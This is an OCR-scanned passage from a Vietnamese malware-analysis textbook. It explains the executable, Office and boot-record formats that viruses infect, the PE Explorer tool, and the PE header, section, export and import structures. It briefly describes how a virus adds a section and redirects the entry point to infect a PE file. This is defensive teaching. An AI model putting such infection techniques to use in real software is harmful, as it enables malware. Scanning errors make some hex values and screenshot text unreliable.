file DOS-EXE. Phan thứ hai là cau trúc đầu file NE-EXE định vi ở địa 
chỉ 0080h, là giá trị có trong trường 3C của DOS-EXE. Đầu NE-EXE 
header là chuỗi nhận dạng “NE'. 
Định dạng NE-EXE có đặc điểm nhận dạng như sau: 
- Mang đặc trưng của định dạng DOS-EXE 
- Trường 3C trong cấu trúc đầu file trỏ đến cấu trúc đầu file thứhai 
- Hai byte đầu tiên của cau trúc đầu file thứhai có giá trị4E và 45 (‘NE’) 
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: 4D 5A 75 01 01 00 00 00 04 00 00 00 FF FF 00 00 II5A4D = MZ: dau hiệu EXE 
: B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 

: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

: 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 1/0080: dia chi NE header 


: 4E 45 05 3C 15 01 1B 00 00 00 00 00 01 03 03 00 II454E = NE: dấu hiệu NE-EXE 
: 00 14 00 28 E2 73 01 00 00 00 03 00 03 00 04 00 licac tham số hệ thống dành cho 
: 10 00 40 00 58 00 A3 00 F6 00 FE 00 BO 01 00 00 IImói trường Windows 16 bit 

: 04 00 04 00 00 00 02 08 1E 00 B8 0B 00 00 0A 03 


Hình 2-7: Cấu trúc đầu file một tập tin NE-EXE tiêu biểu 

Phần tiếp theo sẽ mô tả cách nhận dạng các tập tin thi hành trong môi 
trường Windows 32 bit, các Portable Executable file. 
2.1.2.4 Dinh dạng PE-EXE 
Trong HDH Windows 32 bit, EXE được thiét ké lai dé phù hợp với co 
chế định vị bộ nhớ phăng (flat memory). Portable Executable (PE-EXE) 
gồm 2 nhóm: 
* Các ứng dung chủ(host application): tập tin thi hành EXE, OBJ, 
SCR... 
* Mở rộng của ứng dụng (application extension): gồm các thư viện liên 
kết động DLL (Dynamic Link Library), điều khiến thiết bị SYS (system 
driver), các ứng dụng điều khiển CPL (Control Panel Applet), OCX 
(OLE Control Extension)... Mặc dù chứa mã lệnh nhung các tô chức 
này không tự thực thi. Chúng được gọi từ các ứng dụng chủ 


: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 II5A4D = MZ: dau hiệu EXE 
: B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 

: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

: 00 00 00 00 00 00 00 00 00 00 00 00 EO 00 00 00 II00EO: dia chi PE header 


: 50 45 00 00 4C 01 03 00 20 84 7D 3B 00 00 00 00 14550 = PE: dấu hiệu PE-EXE 
: 00 00 00 00 EO 00 OF 01 OB 01 07 00 00 56 00 00 

: 00 0A 00 00 00 00 00 00 B3 5B 00 00 00 10 00 00 

: 00 70 00 00 00 00 00 01 00 10 00 00 00 02 00 00 


Hinh 2-8: Cáu trüc dàu file mót táp tin PE-EXE tiéu biéu 
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Giống nhưNE-EXE, PE-EXE là vat chủ cua file virus, sâu máy tinh và 
trojan horse. Dac trưng nhận dạng của PE-EXE cũng tương tự NE-EXE 
như hình. 
- Mang đặc trưng của định dạng DOS-EXE 
- Trường 3C trong cau trúc DOS-EXE trỏ đến cấu trúc đầu file PE-EXE 
- Hai byte đầu tiên của file header có giá trị50h và 45h (‘PE’) 
Cấu trúc đầu file PE-EXE chứa các đặc trưng thi hành của đối tượng: 
FileSize, FileType, FileAttribute, MachineWord, NumberOfSections, 
TimeDateStamp,SizeOfOptionalHeader,Characteristics, MajorLinkerVer 
sion, MinorLinkerVersion,SizeOfCode,SizeOflInitializedData,SizeOfUnit 
1alizedData,Relative VirtualAddress, BaseOfCode,BaseOfData, 
BaseOfRVA, ImageBase, SectionAlignment, FileAlignment, 
MajorOS Version,MinorOS Version, MajorImageVersion, 
MinorImageVersion,MajorSubSystemVersion, MinorSubSystemVersion, 
SizeOfImage,SizeOfHeader,FileChecksum,SubS ystem, 
DLLCharacteristics, SizeOfStackReserve, 
SizeOfStackCommit,SizeOfHeapReserve,SizeOfHeapCommit, 
LoaderFlags, NumberOfRvaAndSize, VirtualSize, VirtualAddress, 
SizeOfRawData,PointerToRawData,PointerToRelocation, 
PointerToLineNumber, NumberOfRelocations, 
NumberOfLineNumbers, AddressOfEntryPoint... 


2.1.3 Tap tin Office 

Các tập tin tư liệu (document files) là các tập dữ liệu người dùng bộ công 
cụ Microsoft Office (Bảng P2.4). Đây là đối tượng lây nhiễm của virus 
macro, loại virus sử dung tập lệnh macro VBA (Visual Basic 
Application) của Microsoft. Ngoài đối tượng lây nhiễm chính là các tập 
tin DOC, XLS và PPT; các tập tin template và add-in cũng là nơi “trú 
ngụ” rất tốt cho virus macro. Lưu trữ nhiều đối tượng nhúng phức tạp 
(hình ảnh, âm thanh, bảng biểu, đồ thị...), các tập tin Office thường rat 
lớn (vài trăm KB đến hàng chục MB). Để tiện truy xuất, Microsoft tô 
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chức các tập tin này theo don vi paragraph 512 byte. Đặc điểm nhận 


dang các tập tin nay như sau: 


- Kích thước tập tin là bội số của 512 
- Chuỗi nhận dạng đầu file: D0-CF-11-E0-A1-B1-1A-E1-00-00-00-00 


| Tậplệnh | — Üngdung | Ku | Mô —— — 
Microsoft Word | por Ui dang văn bån 


La liéu báng tính 
VBA macro Microsoft Excel Khuón dang bang tinh 


Microsoft PowerPoint 
PPA | Microsoft PowerPoint addin — | 


Hinh 2-9 : Các tập tin MsOffice có thé bị nhiễm virus 


2.1.4 Tập tin khởi động 

Trong kiến trúc máy tính IBM-PC, mẫu tin khởi động (boot record) 
(MTKĐ) là các tổ chức thực thi trên các đơn vị lưu trữ của thiết bị nhớ 
ngoài (Bảng P2.5). Nhiệm vụ của MTKĐ là khởi tạo các thông số kỹ 
thuật của thiết bị và thực hiện các tiến trình xử lý tiếp theo. Có hai loại 
boot record: MTKD đĩa cứng (master boot cua đĩa cứng) và MTKĐ hệ 


điêu hành (boot sector của dia cứng và đĩa mêm). 


tege! wee (un ` en 


Phân tích thông số kỹ thuật các phân 
khu luận lý 

Tìm và tải boot sector của phân khu 
hoạt động vào bộ nhớ 

Trao quyền cho boot sector 

Phân tích thông số phân khu đĩa cứng 


MTKĐ đĩa cứng 
(master boot) 


hoạt động 
Tìm và tải các tập tin khởi động hệ 
" diéu hành vào bó nhó 
MTKĐ hệ dieu hành Trao quyén cho hé diéu hành 


(boot sector) Phân tích thông số dia mềm 


Tìm và tải các tập tin khởi động hệ 
điều hành vào bộ nhớ 
Trao quyền cho hệ điều hành 


Hinh 2-10: Các tô chức khởi động có thé nhiễm virus 
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2.1.4.1 Mẫu tin khói động đĩa cứng (master boot) 

Mỗi 6 đĩa cứng có thé được chia tách luận lý thành các phân khu 
(partition). Có tói da bốn phân khu cho mỗi 6 vật lý, nhưng chi có một 
phân khu được chọn làm phân khu hoạt động (active partition), là phân 
khu chứa hệ điều hành của hệ thống. 


Master boot: 
- Định vị các phân khu đĩa cứng 
- Tải boot sector hoạt động 


Boot sector hoạt động: 
- Các lệnh khởi tạo bộ nhớ 
- Định vị, tải các file hệ thống 


- Trao quyền cho hệ điều hành 
Thư mục gốc (Root Entries) 


Vùng dữ liệu 
(Data Area) 


Hinh 2-11: Tổ chức đĩa cứng trước khi nhiễm BootVirus 


Boot virus: 

- Các lệnh khởi tạo virus 

- Định vị, tải master boot gốc 

- Trao quyền cho master boot gé 


Master boot (géc) 


Boot sector hoạt động: 
- Các lệnh khởi tạo bộ nhớ 
- Định vị, tải các file hệ thống 


- Trao quyền cho hệ điều hành 
Thư mục gốc (Root Entries) 


Vùng dữ liệu 
(Data Area) 


Hinh 2-12: Tổ chức đĩa cứng sau khi nhiễm BootVirus 
Mẫu tin khởi động đĩa cứng có nhiệm vụ phân tích các phân khu dữ liệu, 
tìm và tải boot sector trên phân khu hoạt động cua đĩa cứng vào bộ nhớ 
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rồi trao quyên cho nó. Hinh minh họa cấu trúc dia cứng, vị trí và vai trò 
của các MTKD. 

Hình mô tả hình ảnh ô đĩa cứng nhiễm boot virus, loại lây vào master 
boot. 

2.1.4.2 Mẫu tin khởi động hệ điều hành (boot sector) 

Boot sector có trên mọi đĩa mềm và các phân khu đĩa cứng. Khi nhận 
quyền từ master boot (hoặc khởi động máy từ đĩa mềm), boot sector sẽ 
tìm HĐH, nạp vào bộ nhớ rồi trao cho HĐH tiếp tục quá trình khởi động. 
Hình minh họa cấu trúc đĩa mềm, vị trí và vai trò của MTKĐ hệ điều 
hành trên đĩa mềm. Hình xxx mô tả hình ảnh đĩa mềm nhiễm boot virus. 
Vi dụ nay cũng đúng cho trường hợp boot virus lây vào boot sector cua 


đĩa cứng. 


Boot sector 
- Các lệnh khởi tạo bộ nhớ 
- Định vị, tải các file hệ thống 
- Trao quyền cho hệ điều hành 
Bảng định vị tập tin 
FAT 1, FAT 2 


Thư mục gốc (Root Entries) 


Vùng dữ liệu 
(Data Area) 


Hình 2-13: Tổ chức đĩa mềm trước khi nhiễm Virus 
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Boot virus 
- Cac lệnh khởi tao virus 
- “nh VỊ, tai apes góc 


Thu muc góc (Root Entries) 
MTKD góc 


Vung dữ liệu 
(Data Area) 


Hình 2-14: Tổ chức đĩa mềm sau khi nhiễm Virus 


2.2 Cau trúc chỉ tiết định dạng PeFile 

Nhu đã thống kê trong chương 1 hiện nay mã độc trên hệ điều hành 
Windows 32bit vẫn pho biết nhất, hiện nay có rất nhiều nhóm chuyên 
viết mã độc trên Windows Xp, Windows 7, Windows Server. Và định 
dạng phó biến của mã độc này thường ở dang PE file. Vì thé sinh viên 
cần hiểu định dạng này để giúp ích cho việc hiểu và phân tích mã độc 
sau này. Dưới đây là tên một số công cụ giúp ích cho sinh viên phân tích 
định dang Pefile. 
Công cu PE Explorer — Chương trình chạy trên môi trường Windows. 
Chức năng cụ thể phần mềm này có thể giúp người phân tích: 
Đọc, xem và chỉnh sửa nội dung trong định dang PE file, như EXE, DLL, 
Active X Controls, SCR,CPL, SYS, MSSTYLES, BPL, DPL.. 
Hỗ trợ làm việc phân tích với các file bị lỗi trong chế độ SafeMode 
Hỗ trợ tính năng kiểm tra tính toàn vẹn của PE files 
Hỗ trợ tính năng sửa giá trị Entry Point 
Chỉnh sửa các thuộc tính của file EXE và DLL file 
Hỗ trợ giải nén UPX, Upack, NSPack 
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5 


ES 


Address of Entry Point: |004473B0 y | Reallmage Che | 1j 


Time Date Stamp ` 46410DF7h [08/05/ 
z HE : Ver : 80 
Field Name Data Value Description Entry Point On Dil Name =. rekon exe 
| 004DB735h 13 | Exported Functions : 570 
Number of Sections 0008h OO8CA724h 14 | Exported Names : 570 


Pointers to Entry Point : 00157FB8h 
Pointers to Name ` 00158840h 
Pointers to Ordinal ` 00159188h 


DOSCCBBSh 15 
D0SCCS66h 16 


D g| a x & #| € @| » B | DI opah 17 
—— 18 


O04DAFE6h 


Ta Icon Entry ??70nsRect@@QAE ABL nsPointC 
E Menu OO4DB008h 19 ??0nsRect@@QAFE@HHHH@Z 
Ề 106 Library description: Description not available 


— Syntax Details 


= he — Undecorated C++ Function: 

Scientific public: _ thiscall nsRect::nsRect(struct nsPo 
(73 Dialog 
L3 Sting Digit grouping 


KI e 


E B firefox. exe 
gA is3250.dl 
i xpcom_core.dll 
01011F26 745E j L01011F86 | E SA nspr4.dll 


(^3 Accelerators 


O000022Ch 


Hình 2-15: Tổng quan chương trình PeExplorer 

Một số tính năng quan trọng như các thông tin về Export, Import và 
Delay Import Table cho phép người phân tích có thé thấy toàn bộ các 
hàm bên ngoài mà File thực thi sử dụng (các file DLL mà file gọi đến). 
Một tính năng khá tiện dụng hữu ich là Syntax Viewer, chức năng nay sẽ 
hiển thị cách thức gọi các hàm trong file PE. Màn hình chính chương 
trình PE Explorer Export Analyzer như sau (chức năng Quick Function 
Syntax Look) 
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Export Properties display the details 
for the currently selected function 


Syntax Description Editor for adding custom comments, 
altering values or creating new library description 


EI PE Explorer - C:\TEST\firefox.exe 


File iew Tools Help 

œ®x @ (ài H| egal MA © 
1| R 

del Time Date Stamp ` 46410DF7h [08/05/2007 23:55:35] 

: Ver : 0.0 = 
Ene £d DII Name ` firefox.exe là 
OO4DB735h 13 | Exported Functions : 570 
OO8CA?24h 14 | Exported Names : 570 
OOSCCBB9h 15 | Pointers to Entry Point : 00157FB8h 
ODBCCS66h 16 | Pointers to Name ` 00158840h 
OO4DAFD3h 17 Pointers to Ordinal  : 00159188h 


OO4DAFE6h 220nsRect@@QAE @ABUnsPoint@@ABUnsSize@@@z 


DO4DBDOSh 13 ??0nsR ect @@QA4E@HHHH@Z x 
Library description: Description not available 
Syntax Details 


Undecorated C++ Function: 
public: _ thiscall nsRect::nsRect(struct nsPoint const &,struct nsSize const «) 


For Help, press F1 


Log Window displays notes, messages, errors, Parameters, return values, calling conventions are conveniently 
warnings, or status of each task displayed for you in the Syntax Details window 


Hinh 2-16: Màn hinh hién thi PE explorer 
Tüy chon Resource Editor 
Tùy chon Resource Editor giúp người phân tích có thể nhìn thay toàn bộ 
các thông tin về bitmaps, jpeg,... và cho phép người phân tích có thé sửa 


lại thông tin mà không cần phải biên dich lại mã nguồn. 
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Save multiple resources at once 
Press the Resource Editor button 
to edit the selected resource 


Resource properties display the details 
for the currently selected resource 


g PE Ekplorerl - C:\TEST\explorer.exe m Hei | 
File |View | Tools Help 
e) B8 ei KK 
là a|eo ` 

aA = E Language : LANG, ENGLISH US 
3i-[-3 MUI ^ Type ` Vista Icon Entry - 256x256 
+} Bitmap Raw Size : 59908 bytes 
3- Icon Entry = 

HAN 

j 2 

2) 3 

HIR) 

HA 

2) 6 

2) 7 

2) 8 

2| E] 

3) 10 

2| 11 

2) 12 

2) 13 

2) 14 — 

2j 15 

2) 16 X 


For Help, press F1 


Hinh 2-17: Màn hình hiển thị chức nang Resource 


Tùy chọn Section Headers Viewer 

PE Explorer cho phép người phan tích có thé xem được số lượng các 
sections, tên các sections, kích thước và các thông tin thuộc tính. Người 
phân tích có thể trích xuất, đồi tên, tính toán lại cho phù hợp, có thé xóa 
các sections đi từ thân chương trình 
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Bl PE Explorer - CATESTVexplorerzxe ko) 
Ele View Tools Help 


o- 2 Al Hl em 3 3) 3 ñ ¿ì à ©@| org | © 

a) CẾ | Kì ox 12 | gà | [0009400 ] zu 

Name Virtual Size ` Virtual &ddress Size of Raw Data Pointer to Raw Data Characteristics Pointing Directories 
E 

2 

IV] ®. / Resource Table 
[V] 9 r 


elocation T able 


RYA | 00 01 02 03 04 05 06 07 | 08 09 OA OB OC OD OE OF | 


't be deleted). 
pries (May be deletec 
eleted). 


F4-TEXT/HEX ` RAW Size: 00001200h; Virtual Size: 00002660h 


Hinh 2-18: Man hinh hién thi Section Headers Viewer 


Tuy chon Section Editor 

Việc khôi phục lai giá trị ban dau cua section (giá tri offset trong dữ liệu 
thật) trong file không phải là việc đơn giản. Trong nhiều trường hợp việc 
khôi phục này còn phụ thuộc vào cảm tính và phải đưa các điều kiện giả 
thiết mới có thể khôi phục được. Nhưng công việc này có thé thực hiện 
tự động được nhờ tính nang Section Editor này. 
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Values reported by 
the Section Header 


The Repair button allows you to automatically The Restore All button allows you to restore 


place flags, according to recommended values 
for the section of the given type 


all the values modified during editing 


& PE Explorer Settion Editor: <.rsrc> 

Header report: 
| SectionName | | Virtual Size | Virtual Addr _|Size of Raw Data | Hdr Ptr to Raw Dath | | Characteristics San 
[isre O00A1B78h (0105E000h O00A1COOh  '0005BE00h | 00056600h | 40000040h eoe 


M Current values: 


Section Alignment 
File Alignment 


Typical «Characteristics» settings : 50000040h 


` ñ0001000h 
` 00000200h 


Apply typical «Characteristics» from: 


Section type | CODE = 


Section Name 
® ISIC 
$> 


| 00 01 02 


000416878 0105E000 


3 04 05 06 0? | 0 


<Size of Raw Data> Calcula 


| Virtual Size | VirtualAddr | Size of Raw Data | 
0002100 


al 00058600 


OA OB OC OD OE OF | 


Filelignment 
SizeOfRawData |00041C00 + 


New SizeOfRawData 


Value” 


*Value: Next pointer to Raw Data 


PointerT oRawData 


Go to original Pointer 
to Raw Data 


File image dump 
browser 


Hinh 2-19 : Hién thi THOng tin Section Editor 


g 


Characteristics: 60000020h 


| 


T1 
35 
a 


tid 


11 


| 


| 


OXSOOO a DO 


Tinh nang Disassembler 


The Calculator helps you calculate 
the Size of Raw Data value 


Section’s characteristics 
viewer 


PE Explorer Disassembler là một tiện tích đưa file PE về dang mã 


nguồn Assembly. 
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View Disassembly Statistics Display selected addresses from the 
Copy selected text from disassembly listing in one of 4 views 
the listing to the clipboard 


isassembler - «C: Ee | "200 


File Edit Search View Navigate 


This button swaps one of 4 views 
with the main window (and back again) 


D ĐỊ| B Bl 5 Sr $r $r a El Z 3x Deel đi @ 


0IU22Ch ^ | Problem and Messages List: 
Unexpected OPCODE (now r/n1at 


D1011F26 745E jz LO1011F86 


04h) ,0O000001h 


| Name List: 


00000003h 
‘lal 


Unprocessed data ` Strings | View 1 | View 2 | View 3 | View 4 


01035468: 101035468 


FOUOO26EC: SUCOIOO26EC Filter = Filter’, O000h 


et O1011F26h Bieda Gee :00: M gbaaa 26:50 30.12.2003 | 12.2008 | 


The status line displays the current position of the cursor, 
the address corresponding to the cursor position, the current status, the time spent 
by the last operation, the current time and date, and the progress indicator for writing the listing to a file. 


Hinh 2-20: Hién chüc náng PE Explorer Disassembly 
Tính náng Dependency Scanner 


Dependency Scanner hiéu thi toàn bó các file DLL mà file PE goi dén 
khi thuc thi. 
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Load selected module to PE Explorer provides For each module found, it lists the full 
a means to examine a particular linked module path to the file and the version information 


& PE Explorer Dependency Scanner - C:\TEST\firefox.exe 
File Help 


v| 8| h| e 


© firefox. exe Path: C:\\Windows\system32\version. dll 
g 5s3250.dl 


D spcom core.dll Version Info 

E nspr4.dl Info: VS_VERSION_INFO 

D smime3.dl Signature: FEEF04BDh 

g ssl3.dll Struc Version: 1.0 

g nss3.dll File Version: 6.0.6001.18000 
xpcom_compat.dll Product Version: 6.0.6001.18000 

D comdig32.dll File Flags Mask: 0.63 

đi shell32.dil File 

A. ole3? dll File - NI (WINDOWS32) 


đi oleaut32 dil File : DLL 
File q UNKNOWN 


E : File g 00:00:00 00/00/0000 
D wins l.drv 


g kernel32. dll 
5 user32. dll 


H gdi32.dl Child Type: StringFileInfo 
LEE) Language/Code Page: 1033/1200 
+l H msvcrt.dll CompanyName: Microsoft Corporation 
g plc4. dll FileDescription: Version Checking and File Installation Li 
BB plds4.di FileVersion: 6.0.6001.18000 (longhorn rtm.080118-1840) 
InternalName: version 
4 | "m 


Struc has Child(ren). Size: 876 bytes. 


DI 
D 
E 
E 
E 
Œ 
E7 
Œ 
irs 
E 
ES 


Always Rescan 


B - Import (module found). $% - Import (module not found/open file error). 


Hinh 2-21 : Hién thi tinh nang Dependency Scanner 


Trên đây là một số tinh năng co bản PE Explorer, phân tiếp theo sẽ mô 
tả kỹ định dạng PE file, 
2.2.1 Định nghĩa PE 

PE viết tắt của Portable Executable là một định dang file cho các file 
exe, Object code, dll trên hệ điều hành Windows 32 bit. Dinh dang PE 
file là một cấu trúc dữ liệu trong đó chứa các thông tin cần thiết để 
loader của Windows có thể quản lý và thực thi được các lệnh trong đó. 
Định dạng này được phát triển dựa trên định dạng UNIX COFF 
(Common Object File Format), hiện giờ phần mở rộng của PE file có 


dang như sau: exe, dll, src, bpl, dpl , cpl, ocx, acm, ax. 
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2.2.2 Cau tric PE file 

Cấu trúc chung của 1 PE file thường sé có 2 Sections: 1 là cho đoạn mã 
(code) và 1 cho phan dit liệu (data). Một chương trinh ứng dụng chạy 
trên nền tang Windows NT có 9 sections được xác định trước có tên 
nhu: .text, .bss, .rdata, data .rsrc, .edata, .idata, .pdata và .debug 


PE FILE SIGNATURE 
PE00 
PE FILE HEADER 


PE OPTIONAL HEA DER 


SECTION HEADERS 


Hình 2-22: Cau trúc PE file 

2.2.2.1.Dos header 

Vùng này chiếm 64 bytes đầu tiên của file. Trong vùng này có 2 giá tri 
quan trong là e magic(0x5a4b) và e lfanew là một DWORD( 4bytes), 
giá trị nằm trong 4 bytes này chứa offset đến PE file header( offset 3C). 
2.2.2.2 PE header 

Đầu tiên windows loader sẽ đọc ở phần MZ header giá trị e magic 
nhằm xem file có hợp lệ hay không.Tiếp theo windows loader sẽ đọc giá 
trie flanew, windows loader sẽ bỏ qua luôn phần dostub và nhảy đến PE 
header. 
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PE gồm 3 thành phan được định nghĩa trong file windows.inc: signature, 
fileheader, optionalheader 

Signature là một DWORD luôn có giá tri 0x4550, nhìn từ gia tri của 
e_flanew. 

Fileheader gồm 20 bytes tiếp theo chứa thông tin vé sơ dó vật lí và 
những đặc tính của file 

Optional header gồm 224 bytes tiếp theo, chứa những thông tin về sơ 
đỗ logic bên trong của PE file. 

File header 

Những thông tin quan trọng bên trong là numberofsection và 
Characteristics. 

Numberofsection thay đổi phần này nếu như muốn thêm hoặc xóa 
Section trong file PE( các mã độc quan tâm đến trường này ví dụ như 
tăng trường thêm 1 sau đó chèn thêm thân cua nó vào trong section nó 
khai báo thêm như vậy mã độc đã chiếm được file). 

Characteristics bao gồm các cờ xác định những thể hiện để chúng ta 
làm việc là một file thực thi(executable) hay một file DII. 

Ta có thể xác định các vị trí này bằng các công cụ như Hex, hoặc Peid, 
LordPE... 

Optionalheader 

Cac thanh phan quan trong bén trong Optionalheader 

AddressofEntryPoint 

RVA( địa chỉ ảo tương đối) của câu lệnh dau tiên, nó trỏ vào đâu 
thì đó là câu lệnh đầu tiên của chương trình được loader của hệ điều 
hành. Nếu một file nguyên thé thì sẽ trỏ tới điểm đầu tiên chạy that của 
chương trình nằm trong section text hay code(diém chạy này goi là 
OEP: Original EntryPoint).Đối với 1 file virus quản lí, nó sẽ thêm 1 
section .text vào sau đó cho trường trỏ vào virus body. Day là một trong 
những trường quan trọng vì trường này sẽ thay đổi hầu hết các kiểu lây 
nhiễm virus để trỏ tới điểm thực thi thực sự của virus code. 

ImageBase địa chỉ nạp được ưu tiên cho PE file, Windows loader 


sẽ cô gang ánh xạ vào vùng nhớ ảo có địa chỉ bat dau tại Imagebase. Câu 
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lệnh khởi dau trên bộ nhớ ảo có địa chi:OEP( trỏ đến câu lệnh khởi 
dau)+image. 

SectionAligment không gian cua section trong bộ nhớ ảo, file thực 
thi được ánh xạ lên bộ nhớ ảo thì sẽ bắt đầu là bội số của giá trị này, 
thường nhỏ nhất là 0x1000. 

FileAligment độ rộng của section trên file sẽ là bội số của trường 
này( ví dụ FileAligment có giá trị 0x200-> section tiếp theo sẽ bắt đầu 
thì tại vị trí trước+0x200 hay một tích của 0x200 với một số nguyên). 

Sectionoflmage bang size của tat cả cách header+ dung lượng thật 
của các section liên kết trong trường sectionaligment. 

Sizeofheader kích thước của tất cả các header+sectiontable. 

DataDirectory một mảng 16 IMAGE DATA DIRECTORY mỗi 
phan có liên quan đến cấu trúc dit liệu trong PE file nhu import address 
table. 


Ta có thé quan sát các thành phan này trong Peid, LordPE.... 


+ [00001000 : [0002 
: [00400000 ions: |0003 
; [00004000 : [4A025EF5 
; [00001000 : [00000400 
; [00002000 : [010F 
+ [00001000 : [00007434 
: [00000200 : [00E0 
: [0108 ; [00000010 


Hinh 2-23 : Quan sát vi trí các thành phan vói PEid 
Chiếm 128 bytes cuối cùng trong Optionalheader và lần lượt là những 
thành phan cuối cùng của PE header IMAGE NT HEADERS. 
Cấu trúc trong data directory gồm có 2 thành phần mà bao gồm thông 
tin về vị trí và kích thước là virtualaddress và isize. 
Virtualaddress là một địa chỉ ảo tương đối của cau trúc dit liệu. 


Isize bao gồm kích thước theo byte của cấu trúc dữ liệu. 
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2.2.2.3 Section table 

Là thành phan tiếp theo sau PE header. Nó là một mang của những cấu 
trúc IMAGE SECTION HEADER, mỗi phán từ sẽ chứa thông tin vé 
một section trong PE file( ví dụ như thuộc tính của nó va virtual offset). 

Các thành phần quan trọng trong section table 

Name tên chỉ một nhãn hoặc có thé trống. 

Virtualsize( DWORD) kích thước cua section sau khi được nạp vào bộ 
nhớ. 

Virtualaddress RVA của section, trình PE loader sẽ phân tích và sử 
dụng giá trị trong trường hợp khi nó ánh xạ section trong bộ nhớ. 

Sizeofrawdata kích thước cua section trong file trên đĩa. 

Pointertorawdata( raw offset) thành phan nay 1a offset từ vị trí bắt đầu 
của file cho tới phần section’s data. Nếu có giá trị 0, thì section’s data 
không được chứa trong file và sẽ không bị bó buộc và thời gian load. 

Characteristlcs bao gồm các cờ executbale code, initialized data, 


uninitialized. 


[ Section Table ] = 


VOffset VSize ROffset RSize Flags 

00001000 00000026 00000400 00000200 60000020 
00002000 00000092 00000600 00000200 40000040 
00003000 00000034 00000800 00000200 E0ũ00040 


Hình 2-24: Các giá tri trong bang section table 
2.2.2.4 PE file section 
Là những section chứa nội dung chính cua file, bao gồm code, data, 

resources và những thông tin khác của file thực thi. Mỗi section có một 
header và một rawdata( dữ liệu chưa được xử lí hoặc chưa được định 
khuôn thức, nó chưa được sắp xếp, biên tập sửa chữa hoặc chưa được 
biểu diễn dưới dạng dễ tìm kiếm). Những section header thì được chứa 
trong section table. 

Một chương trình ứng dụng đặc thù trên Windows: 

Executable code section là các đoạn ma( code segment) tập trung 


vào một section đơn lẻ text hoặc Code. Từ khi widows chuyển sang sử 
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dụng một hệ thống quan li bộ nhớ ảo trên trang, thi có một section code 
lớn hơn dễ dàng hơn trong việc quản lí với hệ thống điều hành. Section 
nay cũng là điểm entry point và bang jump thunk table trỏ tới IAT. 

Data section chứa section .rdata biểu diễn dit liệu chi đọc( read- 
only) ví dụ như các chuỗi, hằng, thông tin...tất cả các biến khác ngoài 
biến tự động mà chỉ xuất hiện trong stack thì được lưu trữ ở section .data. 

Resources section section .rsrc chứa thông tin resource cho một 
module, 16 bytes dau tiên gồm một header giống như các section khác, 
nhưng dữ liệu của section này được cấu trúc vào trong một resource tree 
và được quan sát bằng resource editor. 

Export data section section .edata chứa Export Directory cho một 
chương trình ứng dụng hoặc file dll. Khi biểu diễn, section này bao gồm 
các thông tin va diac chỉ của những ham exported function. 

Import data section .idata chứa những thông tin khác nhau về ham 
được import directory và bang import address table. 
2.2.2.5 Export section 

Section nay có liên quan đến các file Dil. Các hàm có thé duoc export 
thông bởi 1 DII theo 2 cách “ by name” hoặc “ by ordinal only”. 

Vị trí bat đầu trong bang Data Directory “ signature+78”. 

Cấu trúc export được gọi là IMAGE EXPORT DIRECTORY, bên 
trong cấu trúc này có các thành phần quan trọng sau: 

Name internal name của module 

nBase bat dau lấy số thứ tự hay số chi s6( trường nay được sử dung dé 
lay những index trong address-of-function array). 

NumberOfFuntion tổng số các ham mà được export bởi module. 

NumberOfName số lượng các symbols được export bằng name, giá trị 
này không phải là số lượng của tat cả các hàm/symbols trong module. Dé 
lay được con số này ta cần phải kiểm tra NumberOfFuntcion. 

AdressofFuntion một RVA trỏ tới mảng của các con trỏ tới các hàm 
trong module Export Address Table( EAT). 

AdressofName một RVA trỏ tới mang của các RVA của tên hàm được 
lưu trong module Export Name Tabel( ENT). 
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AdressofNameOrdinals một RVA trỏ tới mang 16 bit mà chứa các 
ordinals của các named fuction Export Oridinal Table( EOT). 

Trong cau trúc IMAGE EXPORT DIRECTORY trỏ tới 3 mảng 
và một bảng những chuỗi kí tự ASCII. Mang quan trọng là EAT, vì nó là 
một mảng của các con trỏ hàm mà chứa địa chỉ của các exported 
function. Hai mảng (ENT và EOT) chạy song song theo thứ tự sắp xếp 
tăng dần dựa trên tên của các ham dé một phép tìm kiếm nhị phân có thé 
được thực hiện và sẽ đưa kết quả là số thứ tự của hàm đó được tìm thay 
trong một mang khác. Số thứ tự chỉ là một chi số bên trong EAT. 


IMAGE_EXPORT 
_DIRCTORY 


Characteristic 


————>'F00 DLL" 


— Address Table (RVAs) 


NumberOfF unctions=4 0x400156 | 0x401256 | 0x400520 


Name 1 Name 2 


Export Name 
Table 


ressOfNarneOrdinz Export Ordinal 
Table 


Hinh 2-25 Cau tric Export Table 

Các hàm được export bởi 1 dll theo 2 cach: 

Exporting by Ordinal Only: NumberOfFuntion phải có ít nhất là 
bang với NumberOfName, tuy nhiên một vai trường hợp thi 
NumberOfName lại ít hơn NumberOfFuntion. Khi một hàm được Export 
thông qua số thứ tự, nó không có danh sách trong cả 2 mảng ENT và 
EOT (nó không có tên), những hàm mà không có tên thì được exported 
thông qua số thứ tự. 

Export Forwarding các hàm duoc export không phải là bởi 1 dll 
ban đầu mà thực tế các hàm này lại năm trong một DII khác. Trong hệ 
điều hành WinNT, WinXP...hàm trong kernel.dll va heapalloc được 
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fowarded từ hàm RtlAllocHeap được exported bởi ntdll.dll. File Ntdll.dll 
cũng chứa các API tương tác trực tiếp với kernel windows. Forwading 
được thực hiện tại thời điểm liên kết thông qua một câu lệnh đặc biệt 
trong .def file. 

Forwarding là kĩ thuật mà Microsoft sử dụng để đưa ra một tập hợp 
API thông dụng để che dấu sự khác biệt nền tảng với các hệ điều hành 
khác. 
2.2.2.6 Import Section 
1.RVA 

Một dia chi RVA được sử dung dé mô tả một offset trên bộ nhớ, nếu 
như không được xác định ImageBase. RVA không phải file offset. 

Dé tinh được file offset, đầu tiên ta xác định RVA đó thuộc section nao 
bang công thức: Virtual offset+ virtual size>= RVA>= Virtual offset. 

File offset= RVA- V.offset+ R.offset 
2. Import section 

Import section (.idata) bao gồm thông tin về tat cả các ham được 
imported bởi file thực thi từ các file DII. Phần quan trong nhất của 
section này là ImportDirectory và Import Address Table, 

Import Directory là môt mảng của cấu trúc 
IMAGE_IMPORT_DESCRIPTION. Mỗi cấu trúc gồm 20 bytes và chứa 
thông tin vé dll mà PE file của chúng ta import các hàm vào. Cùng với 
Export Directory, ta có thê tìm thấy Import Directory bằng cách quan sát 
Data Directory(signature+80). 

Trong cau trúc đó thành phan OriginalFirstThunk ( DWORD) là 
một RVA trỏ toi một mảng các cấu trúc IMAGE THUNK DATA ( đây 
